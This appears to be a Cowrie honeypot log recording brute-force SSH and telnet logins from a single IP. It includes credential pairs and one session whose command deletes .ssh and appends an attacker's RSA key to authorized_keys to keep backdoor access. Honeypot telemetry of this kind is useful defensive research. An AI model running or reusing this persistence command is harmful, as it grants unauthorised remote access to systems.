p384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:51.172409Z","src_ip":"212.227.235.229","session":"2225e8875050"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:07:52.474513Z","src_ip":"212.227.235.229","session":"2225e8875050"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:52.791345Z","src_ip":"212.227.235.229","session":"2225e8875050"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:52.792608Z","src_ip":"212.227.235.229","session":"ecbcd9958680"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34852,"dst_ip":"1.2.3.4","dst_port":22,"session":"043a956a1072","protocol":"ssh","message":"New connection: 212.227.235.229:34852 (1.2.3.4:22) [session: 043a956a1072]","sensor":"my-vps","timestamp":"2025-09-08T23:07:56.543066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:07:56.543868Z","src_ip":"212.227.235.229","session":"043a956a1072"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:07:56.681237Z","src_ip":"212.227.235.229","session":"043a956a1072"}
{"eventid":"cowrie.login.failed","username":"runner","password":"123456","message":"login attempt [runner/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T23:07:57.272326Z","src_ip":"212.227.235.229","session":"043a956a1072"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:07:58.412194Z","src_ip":"212.227.235.229","session":"043a956a1072"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37920,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2a0f8a388a5","protocol":"ssh","message":"New connection: 212.227.235.229:37920 (1.2.3.4:22) [session: a2a0f8a388a5]","sensor":"my-vps","timestamp":"2025-09-08T23:08:02.081372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:02.082442Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:02.313154Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.login.success","username":"root","password":"ben","message":"login attempt [root/ben] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:08:03.272161Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:08:03.785731Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:08:03.786457Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:08:03.787613Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:04.018215Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:08:04.533899Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:08:04.534600Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:08:04.766827Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:04.767711Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37936,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5457d9dfa2","protocol":"ssh","message":"New connection: 212.227.235.229:37936 (1.2.3.4:22) [session: 1d5457d9dfa2]","sensor":"my-vps","timestamp":"2025-09-08T23:08:05.003758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:05.004431Z","src_ip":"212.227.235.229","session":"1d5457d9dfa2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:05.238486Z","src_ip":"212.227.235.229","session":"1d5457d9dfa2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:08:06.222770Z","src_ip":"212.227.235.229","session":"1d5457d9dfa2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:07.459367Z","src_ip":"212.227.235.229","session":"1d5457d9dfa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52236,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bf0f89ddfcc","protocol":"ssh","message":"New connection: 212.227.235.229:52236 (1.2.3.4:22) [session: 5bf0f89ddfcc]","sensor":"my-vps","timestamp":"2025-09-08T23:08:07.690475Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:07.691354Z","src_ip":"212.227.235.229","session":"5bf0f89ddfcc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:07.924685Z","src_ip":"212.227.235.229","session":"5bf0f89ddfcc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:08:08.895175Z","src_ip":"212.227.235.229","session":"5bf0f89ddfcc"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:09.126595Z","src_ip":"212.227.235.229","session":"a2a0f8a388a5"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:09.129162Z","src_ip":"212.227.235.229","session":"5bf0f89ddfcc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8302c3eaad9","protocol":"ssh","message":"New connection: 212.227.235.229:41782 (1.2.3.4:22) [session: e8302c3eaad9]","sensor":"my-vps","timestamp":"2025-09-08T23:08:10.974146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:10.974832Z","src_ip":"212.227.235.229","session":"e8302c3eaad9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:19.279314Z","src_ip":"212.227.235.229","session":"e8302c3eaad9"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:19.281117Z","src_ip":"212.227.235.229","session":"e8302c3eaad9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40000,"dst_ip":"1.2.3.4","dst_port":22,"session":"68e026128cd6","protocol":"ssh","message":"New connection: 212.227.235.229:40000 (1.2.3.4:22) [session: 68e026128cd6]","sensor":"my-vps","timestamp":"2025-09-08T23:08:26.875302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:26.876254Z","src_ip":"212.227.235.229","session":"68e026128cd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:26.974175Z","src_ip":"212.227.235.229","session":"68e026128cd6"}
{"eventid":"cowrie.login.failed","username":"build","password":"build.123","message":"login attempt [build/build.123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:08:27.403846Z","src_ip":"212.227.235.229","session":"68e026128cd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37972,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b35b3d29201","protocol":"ssh","message":"New connection: 212.227.235.229:37972 (1.2.3.4:22) [session: 5b35b3d29201]","sensor":"my-vps","timestamp":"2025-09-08T23:08:27.617942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:27.618589Z","src_ip":"212.227.235.229","session":"5b35b3d29201"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:27.943496Z","src_ip":"212.227.235.229","session":"5b35b3d29201"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:28.502354Z","src_ip":"212.227.235.229","session":"68e026128cd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34866,"dst_ip":"1.2.3.4","dst_port":23,"session":"d7c7ad050957","protocol":"telnet","message":"New connection: 212.227.235.229:34866 (1.2.3.4:23) [session: d7c7ad050957]","sensor":"my-vps","timestamp":"2025-09-08T23:08:29.078352Z"}
{"eventid":"cowrie.login.failed","username":"server","password":"Password1","message":"login attempt [server/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T23:08:29.285549Z","src_ip":"212.227.235.229","session":"5b35b3d29201"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:08:30.613282Z","src_ip":"212.227.235.229","session":"5b35b3d29201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56576,"dst_ip":"1.2.3.4","dst_port":22,"session":"79c4e6987f66","protocol":"ssh","message":"New connection: 212.227.235.229:56576 (1.2.3.4:22) [session: 79c4e6987f66]","sensor":"my-vps","timestamp":"2025-09-08T23:08:33.011072Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:33.020978Z","src_ip":"212.227.235.229","session":"79c4e6987f66"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:08:33.282533Z","src_ip":"212.227.235.229","session":"79c4e6987f66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37074,"dst_ip":"1.2.3.4","dst_port":22,"session":"b31c5bdd9385","protocol":"ssh","message":"New connection: 212.227.235.229:37074 (1.2.3.4:22) [session: b31c5bdd9385]","sensor":"my-vps","timestamp":"2025-09-08T23:08:34.104392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:08:34.105279Z","src_ip":"212.227.235.229","session":"b31c5bdd9385"}
{"eventid":"cowrie.login.failed","username":"public","password":"111","message":"login attempt [public/111] failed","sensor":"my-vps","timestamp":"2025-09-08T23:08:34.318725Z","src_ip":"212.227.235.229","session":"79c4e6987f66"}
